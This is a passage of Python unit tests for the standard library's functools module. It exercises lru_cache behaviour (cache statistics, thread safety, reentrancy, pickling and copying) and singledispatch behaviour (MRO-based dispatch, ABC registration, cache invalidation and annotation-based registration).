def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This caused the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations;
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
# FIXME: The following will only work after PEP 560 is implemented.
return
